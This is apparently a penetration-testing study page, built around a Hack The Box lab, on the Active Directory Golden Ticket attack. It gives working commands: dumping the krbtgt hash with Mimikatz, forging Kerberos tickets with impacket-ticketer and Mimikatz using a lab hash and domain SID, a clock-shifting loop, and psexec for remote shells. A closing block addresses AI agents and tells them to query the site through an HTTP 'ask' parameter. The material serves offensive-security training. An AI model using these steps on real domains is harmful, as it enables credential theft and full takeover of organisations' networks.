# Golden Ticket Attack

## Overview

When we compromise the **krbtgt** account, we will own the domain and be able to grant tickets however we want to. This allows us complete access to every machine in the domain.

We can use[ Mimikatz](/active-directory/post-compromise-attacks/mimikatz.md) on the Domain Controller to pull this attack off

## Golden Ticket Attack via Ticketer

First get domain sid (inside of DC shell)

```
Get-ADDomain PNPT.local
```

<figure><img src="/files/hXBlG9RDijmtOPSP1hCt" alt=""><figcaption></figcaption></figure>

`impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>`

```bash
impacket-ticketer -nthash '819af826bb148e603acb0f33d17632f8' -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local Administrator
```

<figure><img src="/files/QRmivC10dWuGLKPmbsxo" alt=""><figcaption></figcaption></figure>

```bash
export KRB5CCNAME=administrator.ccache
```

Add the domain, hostnames etc to /etc/hosts file

<figure><img src="/files/AJT2QhpXsvAgmYa15BT9" alt=""><figcaption></figcaption></figure>

```bash
impacket-psexec htb.local/administrator@forest -k -no-pass
```

{% hint style="info" %}
You might have to change time for Kerberos to accept it
{% endhint %}

<figure><img src="/files/qi96UyfpTUZxeYF7WCvN" alt=""><figcaption><p>From nmap scan</p></figcaption></figure>

<figure><img src="/files/pjvhExo3udeuCKAIhHur" alt=""><figcaption></figcaption></figure>

<pre class="language-bash"><code class="lang-bash"><strong>sudo for i in $(seq 00 24); do sudo date -s $i:36:00; impacket-psexec htb.local/threebigguys@10.10.10.161 -k -no-pass; done
</strong></code></pre>

```bash
sudo date -s 21:36:00 
```

[Resource](https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a)

## Golden Ticket Attack via Mimikatz

#### In the Domain Controller shell

```powerquery
mimikatz.exe
privilege::debug                
sekurlsa::lsa /inject /name:krbtgt
```

<figure><img src="/files/sxabvVaxHS85hvfcKjIK" alt=""><figcaption><p>Note down the SID and NTLM hash of krbtgt account</p></figcaption></figure>

```powerquery
kerberos::golden /user:Administrator /domain:PNPT.local /sid:5-1-5-21--XXX /krbtgt:11f843XXX /id:500 /ptt
```

```
misc::cmd                 
psexec \\DESKTOP-ILG11 cmd.exe
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/active-directory/post-domain-compromise/golden-ticket-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.